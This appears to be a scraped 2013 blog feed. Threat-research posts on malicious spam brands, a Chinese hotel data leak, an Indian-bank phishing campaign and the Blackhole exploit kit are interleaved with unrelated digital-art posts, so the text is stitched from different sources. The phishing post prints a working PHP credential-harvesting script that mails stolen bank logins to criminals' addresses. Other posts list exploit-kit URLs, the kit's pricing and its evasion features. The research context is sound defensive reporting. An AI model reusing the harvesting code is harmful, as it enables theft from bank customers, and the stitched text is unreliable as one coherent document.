Saturday, December 14, 2013

Top Brands Imitated by Malicious Spam

WebSense recently released an InfoGraphic titled "Top Five Subject Lines in Phishing Emails." for January 1, 2013 through September 30, 2013. WebSense has a few differences in the way they gather their data, including being world-wide in their focus (most of my readers probably aren't receiving regular spam with the subject "Communicazione Importante"). But I also wondered about what is happening more recently. We know that the Cutwail spammers who were using the BlackHole Exploit server were the primary folks who were sending out all of those malicious LinkedIn emails, so have the top threats changed since Paunch and friends were arrested in October and the Black Hole Exploit server started drying up?

Malcovery Security has been putting out daily reports of the Top Threat Today in the malicious email world for all of 2013 (although at the beginning of the year they were still using their UAB-legacy name "Emerging Threats By Email"). These reports provide a "deep dive" look at the most prominent malware-laden email of the day. Mid-summer we made the determination that in addition to pushing out "THE" top threat, we would look at other significant malware campaigns of the day, and try to get those reports out faster and in a machine-consumable format.

Last week we presented a one-hour Webinar (still accessible, if you'd like to watch/listen to the recording) - State of Cybersecurity 2013/2014. The first 2/3rds of the webinar walks through the significant cybersecurity events of the year, followed by some Malcovery stats, like the chart shown below, followed by my Ten Security Predictions for 2014.

So, do we see LinkedIn spam as the most dangerous email "post-Paunch"? And for that matter, was it the most dangerous during the BlackHole dominated early portion of the year?

During the "Top Report of the Day" early part of the year, we saw WIDE variety of brands. In fact, in January our top reports included:

Adobe, ADP, American Airlines, BBB(4x), Bank of America, British Airways, Citibank, Digital Insights, DocuSign(2x), Dunn & Bradstreet, eFax, EFTPS (3x), FedEx, Facebook (2x), IRS, KeyBank, LinkedIn, PayPal, US Airways, Verizon, and Xerox.

LinkedIn earned the "Top Threat of the Day" position many times during the year, including January 21, April 9, April 10, July 26, August 28, September 27, and October 24. That is still less than ADP, which was the "Top Threat" on at least thirteen days (January 14, January 22, February 5, February 11, March 15, March 21, March 29, May 13, May 24, August 6, August 16, October 22, November 1st).

But what about the RECENT stuff? And how do things shape up when we look at ALL the significant malware threats we saw delivered by email instead of only "THE" top threat?

Malicious Spam Campaigns August 1 - December 13

For August 1 - December 13, here are the "Campaigns" that we saw most prominently in our T3 XML reporting:

40 Days ==> Wells Fargo (+10 Days as "Top Threat" - August 6, 9, 23, September 16, 24, October 14, 29, 30, November 27, December 11)
40 Days ==> FedEx (+ 7 Days as "Top Threat" - September 5, 9, 10, 11, 17 & October 4, 10, 30)
24 Days ==> ADP (+ "Top" on August 6, 16, October 22, November 1)
23 Days ==> Facebook (+ September 6, 27)
22 Days ==> HMRC (Her Majesty's Revenue & Customs) (+ October 21)
19 Days ==> "Picture" spam (+ October 23, November 8, 18, 22, December 10, 13)
16 Days ==> Royal Bank of Scotland
15 Days ==> Companies House UK
11 Days ==> Sage
10 Days ==> American Express
10 Days ==> HSBC
10 Days ==> LinkedIn (+ August 6, 16, October 22, November 1)
9 Days ==> Dun & Bradstreet

So what does "Most Dangerous" mean? I would certainly agree that a very-well crafted graphical LinkedIn invitation is more likely to be clicked on than a poorly worded letter from a Wells Fargo advisor with a .zip attachment that I'm supposed to open. It could be that WebSense's scoring system takes into account their observed "click-through and attempted click-through" rate, but our measure shows LinkedIn in 10th place as far as active malicious spam campaigns since August 1st, and only two days since the estimated arrest date of Paunch -- October 16th and October 24th.

20 Million Chinese Hotel Guests have data leaked

This morning Secure Computing shared a brief article about Data on 20 Million Chinese Hotel Guests being shared by hackers. Unfortunately the only link in the article was a search for the word Breach on SCMagazine's own website.

The source was South China Morning Post, which has actually been writing about this for some time. On October 11, Amy Li reported that "Home Inn Hotels" a popular discount chain, and Hanting Hotel Group, were using "faulty hotel management software" developed by CNWISDOM. This was reported by "independent internet security watchdog Wuyun.org". The NASDAQ traded hotel chain eventually acknowledged the vulnerability, which they described as a weakness in their Wireless Portal Security System, and announced on their home page that the issue had been resolved, thanking WooYun for helping them with the vulnerability.

CNWisdom Data Leaks

Shortly after the initial exchange, a seller on Taobao (think Chinese eBay) announced that he was selling 8 Gigabytes of hotel guest data for 2,000 Yuan. South China Morning Post reported that the chain had 450,000 hotel rooms in 4,500 hotels, and that when guests register, they are required to provide their home address, phone number, ID card, date of birth, and workplace if they want to use the WiFi service. This is apparently the data that was received.

As reported in Patrick Boehler December 9th story in the South China Morning Post, Chinese Hackers Leak Hotel Guest Data on WeChat, multiple websites were distributing the hotel data for 20 million guests, and some enterprising hackers had even built a chat interface allowing you to TXT someone's ID card number to the service and having it reply with the details of any hotel stays by that guest.

WooYun

WooYun regularly shares vulnerability data, so we thought we would start at the beginning and find that. There were several "cnwisdom" breach reports there, including:

WooYun-2013-41171 (submitted October 28, 2013) - which referred to an SQL injection vulnerability

WooYun-2013-41171 (submitted October 27, 2013) - which referred to a STRUCTS problem

WooYun-2013-034935 (submitted August 21, 2013) - the WiFi Data Leak

Unfortunately, I have to rely on some Google Translate here ...

The way WooYun explains it is (Gary's paraphrase of the Google Translate of what they said:)

"Users connect to their hotel's open WiFi, which requires them to use a webpage to authenticate. That webpage is using http protocol, which means the username and password are transmitted in the clear. But the next phase of the authentication is to update a central database of WiFi information. IN THE CLEAR, the authentication connects to a database using the username "cnwisdomapi" and the password "3b823[马赛克]ac36a"!!
That authentication userid and password can be used to query details for anyone who used the WIFI in ANY of these hotels!

After the media used this screen shot in their reports, the Hotel chain responding saying that the screen shot did not represent personal information of their guests.

The "Vulnerability Response" section says that the vendor was notified and confirmed the vulnerability on August 26th. On October 8th, they replied that the Vulnerabilities had been repaired and a proper authentication method that preserved encryption throughout the process to protect guests had been implemented.

WooYun and 189

This is hardly the first major breach from WooYun! In January they reported serious vulnerabilities in the Chinese telecom giant 189's infrastructure that allowed any user with a webbrowser to get detailed billing information, including the user name, address, and detailed call history for any mobile phone user!

The same breach reported also shared details on how any one could access a webserver on "wapsc.189.cn:8006" and use the "wapLogin/sendSms.action" to send unauthenticated SMS messages to any cell phone!

In a wonderful example of responsible reporting, WooYun declared the vulnerability to be "Level 20" (their highest rank) and reported the details to the CNCERT National Internet Emergency Center on January 22 prior to releasing the details publicly on March 8, 2013.

Friday, December 13, 2013

Indian Banks targeted in multi-brand Phishing Attack

Malcovery Security's PhishIQ portal is a fascinating place to explore. This week I did a "Security Year in Review" webinar for an audience of our customers and friends which was so much fun to prepare! (We recorded the webinar for those who missed it - you can watch the recording here: State of Cybersecurity 2013/2014. We reviewed the top security events of 2013, including some of the biggest hacks, the most prominent malware trends, and the successes that our security community - researchers, security companies, and law enforcement - had in responding to these challenges. I also shared my Ten Security Predictions for 2014. I've posted those to the LinkedIn group Enterprise Security Intelligence & Big Data and would love to hear your thoughts on them. Please consider joining our group and the conversation!

Malcovery Security 2014 Prediction #9: Phishing will hit hard in the emerging online banking markets in India and China

This prediction is based on a few things. The criminals in the phishing world are international. Although most phishing victims continue to be in the United States at the present time, the reason for this is the widespread availability of high-speed Internet and the prominence of Online Banking. As China and India, who between them represent 36.5% of the world population, increasingly embrace online banking the criminals of the world will turn their eyes to this population who is now banking online, but who does not have decades of experience with Internet Safety issues leading up to them. I've already received some questions about this prediction, so I thought I would share some feedback on this one by showing some of the visibility we have in PhishIQ to the issue.

The basic work, unfortunately, has already been done for preparing to attack the Indian banks. Phishing kits exist and are in circulation for at least forty Indian banks that we have seen at Malcovery just during the previous month!

e-Police India shared a phishing attack on their website at the beginning of November about a phishing campaign imitating the Reserve Bank of India. In this phishing attack, the spammers have indicated that you need to "Select Your Bank From the List Below to Complete Your OAC Registration Process". Malcovery has seen this kit several times, including for example a live version today on "thedelamere.co.uk".

For each of the icons on the list below, a full corresponding phishing site is offered. For some reason, the "western" banks on the list do NOT go to a phishing site, but provide a link directly to the brand indicated, These "non-phish" (mostly western banks, but some Indian as well) would include Barclays, Citibank, Deutsche Bank, Karnataka Bank, Karur Vysya Bank, Lakshmi Vilas Bank, RBS, Standard Charter, and Tamilnad Mercantile Bank.

(Screen shot of phish on "thedelamere.co.uk")

The same set of phishing files is regularly occurring in our Phishing intelligence system with more than 80 websites having been hacked to host these files.

Because Malcovery is REALLY good at recovering phishing kits, we were able to recover the criminals' email addresses in 15 of the 80 websites. akachi16akachi16@sify.com, akachiugonna@rediffmail.com, and akachiugonna@sify.com were found in 11 of those 15.

In November, the "action file" of these phish sent email to four email addresses, as shown above, and as observed by the investigators at e-Police.in. More recently, the "chizobamyluck@gmail.com" address has been excluded from the kit.

For example, for the phishing site:

The action file was:

<$fromemail = "$ip";
$ip = getenv("REMOTE_ADDR");
$message = "-----------------+ Andhra Bank Details +-----------------\n";
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Transaction Password: " .$_POST['pass2']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$message .= "Client IP : $ip\n";
$message .= "-----------------+ Created in 2012 By DON PERO------------------\n";

$recipient = "akachi16akachi16@sify.com, akachiugonna@rediffmail.com,
akachiugonna@sify.com, chizobamyluck@gmail.com";
$subject = "Andhra $ip";
$headers = "From: admin@gameshack.org";
$headers .= $fromemail."\n";
$headers .= "MIME-Version: 1.0\n";

if (mail($recipient,$subject,$message,$headers))
{ header("Location: http://andhrabank.com"); }else

{ echo "ERROR! Please go back and try again."; }>

Morgan Higby-Flowers


"My interests circulate around particular spectrums in newmedia art, specifically work that incorporates discarded technologies. My sensibility tends to pursues encounters with wonderment & visual representations of new deformations." - Morgan Higby-Flowers. See more;


2013-08-13 at PM 03.49.33, 2013




PixelJAM2013_mrgn_hgby-flwrs, 2013



output [of] no-input system studio performance (long), 2010



notha, 2010



Movie 5, 2010


thanks for the tip, Chris Shier

Wednesday, December 11, 2013

Onformative at Alpha-ville EXCHANGE



Onformative is a design studio founded by Julia Laub and Cedric Kiefer in 2010. The studio specialises in generative design covering various types of media and topics. At the intersection of technology, design and emotion, Onformative develop innovative, cross-media solutions for their customers in the domains of culture, education and technology.

Onformative is one of the great guest to talk at the first edition of Alpha-ville EXCHANGE next 17th January 2014 at Rich Mix Cinema and Arts Centre in London. Julia and Cedric have been asked to talk about their practice, influences and recent/ in progress works at the event. They are going to illustrate how they move across the commercial, artistic and sometimes educational sectors and how they use collaboration and exchange of knowledge to produce works and projects. 

Alpha-ville EXCHANGE is just a one-day event designed to offer the London art, tech and creative communities the opportunity to connect, exchange ideas, get inspired and discover new talent. More information about participant artists, programme and tickets prices here. See into the post some generative projects and concepts Onformative has been working in the last three years;



unnamed soundsculpture, 2012

"The basic idea of the project is built upon the consideration of creating a moving sound sculpture from the recorded motion data of a real person. For our work we asked Laura Keil  a berlin based dancer to interpret a musical piece – Kreukeltape by Machinefabriek – as closely as possible with the movement of her own body. She was recorded by three depth cameras (Kinect), in which the intersection of the images was later put together to a three-dimensional volume (3d point cloud), doing so we were able to use the collected data throughout the further process.

The three-dimensional image allowed us a completely free handling of the digital camera, without limitations of the perspective. The camera also reacts to the sound and supports the physical imitation of the musical piece by the performer. She moves to a noise field, where a simple modification of the random seed can consistently create new versions of the video, each offering a different composition of the recorded performance. The multi-dimensionality of the sound sculpture is already contained in every movement of the dancer, as the camera footage allows any imaginable perspective."



"Similar to painting, a single point appears to be still very abstract, but the more points are connected to each other, the more complex and concrete the image seems. The more perfect and complex the “alternative worlds” we project and the closer together their point elements, the more tangible they become. A digital body, consisting of 22 000 points, thus seems so real that it comes to life again.

Using 3 different microsoft kinect cameras the movement of the dancer was recorded into those 3d pointclouds that were synced and exported as one large dataset as Krakatoa particle files to be loaded into 3ds max for further rendering and creation of the 3d scene including the camera movement that is controlled by the audio as well." - Onformative

Project collaboration with Daniel Franke.



fragments of RGB, 2010

"This project experiments with illusion and perception on various levels. The classic LED screen as a medium was simulated and disintegrated by the creation of a pixel-like optic using simple projection rather than the entire image’s being comprised of individual points of light. If one examines the idea of perception more closely, especially individual perception – which differs from individual to individual – then a second consideration arises in regard to »fragments of RGB«.

We became interested in the observer’s personal view and in »re-projecting« this. The installation reacted to and changed with the viewer’s movement and, hence, his perspective and point of view. The illusion of a LED screen was destroyed and the RGB elements dissolved to form new, translated images and, thus, a transformed »reality«. Beside the installation that illustrates the sensitive interaction between person and image, »fragments of RGB« is also intended as a photographic series in which the transformations that occurred on the display were consciously photographed, whereby the effect of alienation was intensified in the design process." - Onformative




ScreenCapturer Processing library, 2012

"Probably everybody has experienced how complicated it might be to work with video in Processing, especially if you want to import a lot of different videos for testing purposes. You need to take care of the resolution, the codec and the size of the video file, in order to make it suit your specific requirements. Furthermore you might not even have access to a video or image file at all and just want to test some media in your sketch. That’s where the Processing ScreenCapturer library comes in quite handy."

"The ScreenCapturer library for Processing enables you to capture any part of your screen and include this capture into your Processing sketch as image or video. This way you can try out video or image input in your Processing sketch without having to change the video/image import lines in your source code and don’t have to worry about problems regarding resolution, codec etc. Using this tool you can simply play a video in your browser or from your hard drive and move the ScreenCapturer window on top of your video and access everything inside this window frame from your Processing sketch. ScreenCapturer also allows you to take screenshots of certain areas of your desktop at stated intervals that could be useful for time laps videos for example." - Onformative

View code and project page here



reël, 2011

"As an experiment, we wanted to investigate in the different visual forms, the process of sorting can have. Each sorting algorithm reveals its particular strategy as a unique pattern. We took a row of pixels of a photograph and sorted the pixels by their color value. Since Processings color object is actually a number, they are perfect to be ordered. It worked well with grays, but revealed an unintuitive sorting of the colors. While they are ordered mathematically, one expects the gradients to be different.

In the next step we took each pixelrow from top to bottom, scanning and sorting image. This way a certain rythm of color hues, brightness and darkness is added to the sorting processes. Each animation has a duration if 720 frames, since 720 rows were sorted from top to bottom. We like the idea of translating the image dimension into the time. The next step would be to think about how the image has to look like, to create a certain rythm, and in the end maybe a story." - Onformative








Alpha-ville EXCHANGE 1 features a Day Programme packed with presentations, talks and social events alongside a music programme in the evening for attendees to network and enjoy. Work will be presented across: motion graphics, graphic design, illustration, interaction design, generative design, digital and software art, mixed media art, data visualisation and more. Tickets available here.


Tuesday, December 10, 2013

Undervolt & Co


Still from Dazzling Odysseys: The Electric Mind by Johnny Woods

Undervolt & Co is a new experimental video label founded by Yoshi Sodeoka, only saying this it already sounds promising, but Johnny Woods and Nicholas O’Brien joined the team as director and senior editor respectively, something like that had to happen someday and it's just here. Have a look to the website and check out how they have launched the label > there are six great titles from artists such  as Jennifer Juniper Stratford, Spectral Net (Birch Cooper, Brenna Murphy, Sabrina Ratté and Roger Tellier-Craig), Cristopher Cichocki, Jimmy Joe Roche and Yoshi Sodeoka and Johnny Woods are also part of the artist line up. Each title has different pieces or it depends how the artists have decided to do it, but you will get an average of 20 min title for $5 each! Into the post you can see one minute trailer from each title which gives you an idea about how are them, but to be honest 1 min is nothing compared to what can happen in video from 15 min to for example one hour that it's the one by Johnny, it's a great opportunity to buy and download some great video art that you won't find online as the label keeps the exclusivity of. See more;

Read more about Undervolt & Co, how it was created, aesthetics featured and more in an interview with Yoshi Sodeoka by Benoit Palop here. FAQ about  here.


Lost In Linear Valley: Jennifer Juniper Stratford




Spectral Sequences Vol. 1: Spectral Net




Liquid Static: Cristopher Cichocki




Distortion III: Yoshihide Sodeoka




Greetings From Baltimore: Jimmy Joe Roche




Dazzling Odysseys: The Electric Mind- Johnny Woods







Sunday, December 8, 2013

Paunch and the BlackHole/Cool Exploit Kit

After months of speculation, the creator of the Blackhole exploit kit can be demonstrated to be in custody. As usual with all things Russian in the Cybercrime world, Brian Krebs broke the story in the US with Meet Paunch the Accused Author of the Blackhole Exploit Kit, which provided photos of a character believed to be Paunch. These photos in turn were posted by the leading cyber investigations firm in Russia, Group-IB, who participated in the investigations with the Russian police, culminating in his arrest in the city of Togliatti on October 4, 2013.


(Image from Group-IB)

The MVD link, provided by Brian and Google Translated here, shows that a group of 13 criminals were all arrested for violation of Russia's criminal code Article 1.2.210 "the creation of and participation in a criminal organization to jointly commit one or more serious crimes". In other words, Paunch and friends have been charged with the Russian version of the RICO Act! We've just recently seen the same TYPE of law used in the US in the case of David Camez, who was charged with racketeering and conspiracy charges for his role in the crimes at Carder.su (he is one of 55 defendants in the case, and the first to go to trial...) More on Carder.su's David Camez's RICO case here.

The speculations that something may have been up with Paunch began back in October. The best early coverage we had was from Charlie Osborne, who posted over on ZDNet Blackhole malware toolkit creator Paunch suspect arrested, based off the single tip that every other source we had was also referring to -- a statement from Maarten Boone over at Fox-IT in the Netherlands.

At the time of the article in ZDNet, October 9th, Charlie quoted AVG as saying that "the Blackhole Exploit Kit is currently ranked 24th in the world of online malware, affecting 36,199 websites in 218 countries." The same link provided in that article now shows that BEH is ranked 161st, falling from position 132 on the list last week. To check the current status, use this link to AVG's AVG Info on Blackhole Exploit Kit.

Paunch posted updates about his malicious code as recently as September 2013, on Exploit.in (sorry, login required!) As usual, the authors shamelessly listed their contact information, which of course lead to their downfall:

Our contacts:
Author and a support в 1 лице (time normalized):
JID: paunch@jabber.no
JID: paunch@thesecure.biz
JID: paunch@neko.im
ICQ: 343002

A support (time from 9 to 19 on weekdays)
JID: blackhole2@jabber.ru
ICQ: 530082
The pricing at this time was given as:


happy to announce that prices have remained the same:
Rent on our server:
-Day rental - $ 50 (limit traffic 50k hits)
-Week rent - $ 200 (limit traffic 70k hits a day)
-Month lease - $ 500 (limit traffic 70k hits a day) if need traffic limit can be increased for an additional fee

License on your server:
-License for 3 months $ 700
License-half year $ 1,000
-Year license for $ 1500
multi-domain version of the bunch - $ 200 one-time fee for the entire term of the license (not binding on the domain and on the ip)
change of the domain on the standard version of the bunch - $ 20
change ip on multidomain version bundles - $ 50
single cleaning - $ 50
Autoclean a month - $ 300
Kafeine has the original post on his excellent malware analysis blog Malware don't need Coffee.

The new version offered many options, including statistics about Windows 8 and Mobile Device infection, an option to have "less obvious" URLs for your Blackhole Exploit address, and the ability to automatically regenerate your .exe files in ways that would not be detected by AV engines. (This feature is the "Autoclean" offered for $300 per month.)

Many security features of the "auto-ban" variety were included to prevent the malware from functioning for "Reversers". These included:


11. Completely updated section "Security" on it can shine even a sub category:
a) an opportunity to block traffic without referrer (we recommend always keep it turned on)
b) the opportunity to ban unnecessary referrers
c) an opportunity to ban all referrers except your own
d) an opportunity to ban bots on the basis of a pre-arranged IP address list
d) an opportunity to ban TOR network Types which are dynamically updated as the practice most reverser work from there (we recommend always keep it turned on)
e) there was a recording mode, let you stop and wait for traffic traffic from where you do not, put the record mode, and all reversers and bots that go on your link after stopping cores go straight to the ban list)
12. Since section 11 we had a lot of opportunities for Bans, selecting at least one embodiment of the ban appears in the menu "Ban Statistics", in which you can see the number of blocked traffic, and the reason for blocking
I can tell you that those banning practices were creating quite a bit of chaos on "Reversers"! Fortunately, my lead malware analyst at Malcovery Security had found a fairly reliable (if time-consuming) way to defeat Paunch. To show the ease of identifying his previous URL pattern, look at this list of reports Malcovery generated in the past six months where BlackHole was found just using the URL path of a "/forum/viewtopic.php" URL!


(Right-Click, "View Image" for larger version)

Much, much more data is available in the several-times daily "Malcovery T3 Reports" and additional analysis is available for interested parties. This data is ONLY showing the "/forum/viewtopic.php" aspects of this malware.

In the first column, the date of the spam campaign and the "imitated brand" is listed

2013-05-13ADP hxxp://116.122.158.195:8080 /forum/viewtopic.php
2013-05-13ADP hxxp://mail.yaklasim.com:8080 /forum/viewtopic.php
2013-05-13ADP hxxp://vulcantire.net /forum/viewtopic.php
2013-05-13ADP hxxp://westautorepair.com /forum/viewtopic.php
2013-05-13AmericanExpresshxxp://116.122.158.195:8080 /forum/viewtopic.php
2013-05-13AmericanExpresshxxp://mail.yaklasim.com:8080 /forum/viewtopic.php
2013-05-13AmericanExpresshxxp://vulcantire.net /forum/viewtopic.php
2013-05-13AmericanExpresshxxp://westautorepair.com /forum/viewtopic.php
2013-05-13Citibank hxxp://116.122.158.195:8080 /forum/viewtopic.php
2013-05-13Citibank hxxp://mail.yaklasim.com:8080 /forum/viewtopic.php
2013-05-13Citibank hxxp://vulcantire.net /forum/viewtopic.php
2013-05-13Citibank hxxp://westautorepair.com /forum/viewtopic.php
2013-05-21eFaxhxxp://116.122.158.195:8080 /forum/viewtopic.php
2013-05-21eFaxhxxp://debthelpsmart.org /forum/viewtopic.php
2013-05-21eFaxhxxp://debtsmartretirement.com /forum/viewtopic.php
2013-05-21eFaxhxxp://mail.yaklasim.com:8080 /forum/viewtopic.php
2013-05-24ADP hxxp://116.122.158.195:8080 /forum/viewtopic.php
2013-05-24ADP hxxp://monteazul.clicken1.com:81 /forum/viewtopic.php
2013-05-24ADP hxxp://panama.clicken1.com:81 /forum/viewtopic.php
2013-05-24ADP hxxp://talentos.clicken1.com:81 /forum/viewtopic.php
2013-05-29WesternUnion hxxp://199.168.184.198:81 /forum/viewtopic.php
2013-05-29WesternUnion hxxp://monteazul.clicken1.com:81 /forum/viewtopic.php
2013-05-29WesternUnion hxxp://panama.clicken1.com:81 /forum/viewtopic.php
2013-05-29WesternUnion hxxp://talentos.clicken1.com:81 /forum/viewtopic.php
2013-05-24Chasehxxp://116.122.158.195:8080 /forum/viewtopic.php
2013-05-24Chasehxxp://monteazul.clicken1.com:81 /forum/viewtopic.php
2013-05-24Chasehxxp://panama.clicken1.com:81 /forum/viewtopic.php
2013-05-24Chasehxxp://talentos.clicken1.com:81 /forum/viewtopic.php
2013-06-05WesternUnion hxxp://116.122.158.195:8080 /forum/viewtopic.php
2013-06-05WesternUnion hxxp://199.168.184.198:81 /forum/viewtopic.php
2013-06-05WesternUnion hxxp://verybestblueberry.com /forum/viewtopic.php
2013-06-05WesternUnion hxxp://wildmaineblues.com /forum/viewtopic.php
2013-07-08Citihxxp://2ndtimearoundweddingphotography.com /forum/viewtopic.php
2013-07-08Citihxxp://bobkahnvideo.com /forum/viewtopic.php
2013-07-08Citihxxp://gfpmenusonline.com /forum/viewtopic.php
2013-07-08Citihxxp://gfponlineordering.com /forum/viewtopic.php
2013-07-10eFaxhxxp://gfpshoppingcarts.net /forum/viewtopic.php
2013-07-10eFaxhxxp://greatstockfoodimages.com /forum/viewtopic.php
2013-07-10eFaxhxxp://imhungrynow.com /forum/viewtopic.php
2013-07-10eFaxhxxp://one2onebiznet.com /forum/viewtopic.php
2013-07-12UPShxxp://buzztag.com /forum/viewtopic.php
2013-07-12UPShxxp://customkids.com /forum/viewtopic.php
2013-07-12UPShxxp://webersmokeymountaincookerreview.com /forum/viewtopic.php
2013-07-12UPShxxp://wiiunlockplusreview.com /forum/viewtopic.php
2013-07-25CNNhxxp://198.57.130.35:8080 /forum/viewtopic.php
2013-07-25CNNhxxp://alsultantravel.com:8080 /forum/viewtopic.php
2013-07-25CNNhxxp://webmail.alsultantravel.com:8080 /forum/viewtopic.php
2013-07-25CNNhxxp://webmail.alsultantravel.info:8080 /forum/viewtopic.php
2013-07-25Facebookhxxp://198.57.130.35:8080 /forum/viewtopic.php
2013-07-25Facebookhxxp://alsultantravel.com:8080 /forum/viewtopic.php
2013-07-25Facebookhxxp://webmail.alsultantravel.com:8080 /forum/viewtopic.php
2013-07-25Facebookhxxp://webmail.alsultantravel.info:8080 /forum/viewtopic.php
2013-08-02Moneygramh00p://50.57.185.72:8080 /forum/viewtopic.php
2013-08-02Moneygramh00p://arki.com:8080 /forum/viewtopic.php
2013-08-02Moneygramh00p://northernforestcanoetrail.com /forum/viewtopic.php
2013-08-02Moneygramh00p://www.arki.com:8080 /forum/viewtopic.php
2013-08-14BankofAmericahxxp://gutterglovegutterprotection.com /forum/viewtopic.php
2013-08-14BankofAmericahxxp://gutterguardbuyersguide.com /forum/viewtopic.php
2013-08-14BankofAmericahxxp://gutterhelmetleafguardgutterprotection.com /forum/viewtopic.php
2013-08-14BankofAmericahxxp://gutterprosmaryland.com /forum/viewtopic.php
2013-08-14WellsFargohxxp://gutterglovegutterprotection.com /forum/viewtopic.php
2013-08-14WellsFargohxxp://gutterguardbuyersguide.com /forum/viewtopic.php
2013-08-14WellsFargohxxp://gutterhelmetleafguardgutterprotection.com /forum/viewtopic.php
2013-08-14WellsFargohxxp://gutterprosmaryland.com /forum/viewtopic.php
2013-08-15FAXhxxp://1800callabe.com /forum/viewtopic.php
2013-08-15FAXhxxp://1866callabe.com /forum/viewtopic.php
2013-08-15FAXhxxp://abemoussa.com /forum/viewtopic.php
2013-08-15FAXhxxp://abemuggs.com /forum/viewtopic.php
2013-08-16ADPhxxp://hubbywifeco.com /forum/viewtopic.php
2013-08-16ADPhxxp://hubbywifedesigns.com /forum/viewtopic.php
2013-08-16ADPhxxp://hubbywifedesserts.com /forum/viewtopic.php
2013-08-16ADPhxxp://hubbywifefoods.com /forum/viewtopic.php
2013-08-16WellsFargohxxp://hubbywifeco.com /forum/viewtopic.php
2013-08-16WellsFargohxxp://hubbywifedesigns.com /forum/viewtopic.php
2013-08-16WellsFargohxxp://hubbywifedesserts.com /forum/viewtopic.php
2013-08-16WellsFargohxxp://hubbywifefoods.com /forum/viewtopic.php
2013-08-19ADPhxxp://hubbywifewines.com /forum/viewtopic.php
2013-08-19ADPhxxp://ipodwalla.com /forum/viewtopic.php
2013-08-19ADPhxxp://jerseycitybags.com /forum/viewtopic.php
2013-08-19ADPhxxp://jerseyluggage.com /forum/viewtopic.php
2013-08-19Facebookhxxp://frankcremascocabinets.com /forum/viewtopic.php
2013-08-19Facebookhxxp://giuseppepiruzza.com /forum/viewtopic.php
2013-08-19Facebookhxxp://gordonpoint.biz /forum/viewtopic.php
2013-08-19Facebookhxxp://gordonpoint.info /forum/viewtopic.php
2013-08-20UKLandRegistryhxxp://giuseppepiruzza.com /forum/viewtopic.php
2013-08-20UKLandRegistryhxxp://gordonpoint.biz /forum/viewtopic.php
2013-08-20UKLandRegistryhxxp://gordonpoint.info /forum/viewtopic.php
2013-08-20UKLandRegistryhxxp://gordonpoint.org /forum/viewtopic.php
2013-08-26UPShxxp://gordonpoint.org /forum/viewtopic.php
2013-08-26UPShxxp://hitechcreature.com /forum/viewtopic.php
2013-08-26UPShxxp://industryseeds.ca /forum/viewtopic.php
2013-08-26UPShxxp://infocreature.com /forum/viewtopic.php
2013-09-06CitizensBank-KeyBankhxxp://luggagepoint.de /forum/viewtopic.php
2013-09-06CitizensBank-KeyBankhxxp://luggagepreview.com /forum/viewtopic.php
2013-09-06CitizensBank-KeyBankhxxp://luggagewalla.com /forum/viewtopic.php
2013-09-06CitizensBank-KeyBankhxxp://luxluggage.com /forum/viewtopic.php
2013-09-09FedExhxxp://luxurybrandswalla.com /forum/viewtopic.php
2013-09-09FedExhxxp://mickmicheyl.biz /forum/viewtopic.php
2013-09-09FedExhxxp://mickmicheyl.ca /forum/viewtopic.php
2013-09-09FedExhxxp://mickmicheyl.com /forum/viewtopic.php
2013-09-10FedExhxxp://actorbell.com /forum/viewtopic.php
2013-09-10FedExhxxp://facebookfansincrease.com /forum/viewtopic.php
2013-09-10FedExhxxp://fillmaka.com /forum/viewtopic.php
2013-09-10FedExhxxp://fillmmaka.com /forum/viewtopic.php
2013-09-11FedExhxxp://actorbell.com /forum/viewtopic.php
2013-09-11FedExhxxp://facebookfansincrease.com /forum/viewtopic.php
2013-09-11FedExhxxp://fillmaka.com /forum/viewtopic.php
2013-09-11FedExhxxp://fillmmaka.com /forum/viewtopic.php
2013-09-11FedExhxxp://filmaka.biz /forum/viewtopic.php
2013-09-11FedExhxxp://filmaka.co.uk /forum/viewtopic.php
2013-09-12FedExhxxp://fillmmaka.com /forum/viewtopic.php
2013-09-12FedExhxxp://filmaka.biz /forum/viewtopic.php
2013-09-12FedExhxxp://filmaka.co.uk /forum/viewtopic.php
2013-09-12FedExhxxp://filmaka.info /forum/viewtopic.php
2013-09-13FedExhxxp://filmaka.org /forum/viewtopic.php
2013-09-13FedExhxxp://filmaka.us /forum/viewtopic.php
2013-09-13FedExhxxp://filmmaka.com /forum/viewtopic.php
2013-09-13FedExhxxp://filmpunjab.com /forum/viewtopic.php
2013-09-16FedExhxxp://rockims.com /forum/viewtopic.php
2013-09-16FedExhxxp://swingingwiththefinkelsthemovie.com /forum/viewtopic.php
2013-09-16FedExhxxp://taxipunjab.com /forum/viewtopic.php
2013-09-16FedExhxxp://taxisamritsar.com /forum/viewtopic.php
2013-09-17FedExhxxp://defeat-autism.com /forum/viewtopic.php
2013-09-17FedExhxxp://defeat-autism.org /forum/viewtopic.php
2013-09-17FedExhxxp://saltlakecityutahcommercialrealestate.com /forum/viewtopic.php
2013-09-17FedExhxxp://utahbankownedhomesonline.info /forum/viewtopic.php
2013-09-17FedExhxxp://utahonlinerealestate.com /forum/viewtopic.php
2013-09-18FedExhxxp://defeat-autism.com /forum/viewtopic.php
2013-09-18FedExhxxp://defeat-autism.org /forum/viewtopic.php
2013-09-18FedExhxxp://glgkorea.com /forum/viewtopic.php
2013-09-18FedExhxxp://jadecreditdesign.com /forum/viewtopic.php
2013-09-19FedExhxxp://louievozza.com /forum/viewtopic.php
2013-09-19FedExhxxp://louvozza.com /forum/viewtopic.php
2013-09-19FedExhxxp://lvconcordecontracting.com /forum/viewtopic.php
2013-09-19FedExhxxp://lv-contracting.com /forum/viewtopic.php
2013-09-20FedExhxxp://lvconcordecontracting.com /forum/viewtopic.php
2013-09-20FedExhxxp://mcbelectrical.ca /forum/viewtopic.php
2013-09-20FedExhxxp://oliviagurun.com /forum/viewtopic.php
2013-09-20FedExhxxp://onecable.ca /forum/viewtopic.php
2013-09-23FedExhxxp://dsostermanlaw.com /forum/viewtopic.php
2013-09-23FedExhxxp://nefcapital.com /forum/viewtopic.php
2013-09-23FedExhxxp://simpacswings.com /forum/viewtopic.php
2013-09-23FedExhxxp://wetalkbb.net /forum/viewtopic.php
2013-09-24FedExhxxp://acedataintelligence.com /forum/viewtopic.php
2013-09-24FedExhxxp://acedataintelligence.net /forum/viewtopic.php
2013-09-24FedExhxxp://dsostermanlaw.com /forum/viewtopic.php
2013-09-24FedExhxxp://nefcapital.com /forum/viewtopic.php
2013-09-27Facebookhxxp://directgrid.org /forum/viewtopic.php
2013-09-27Facebookhxxp://directgrid.us /forum/viewtopic.php
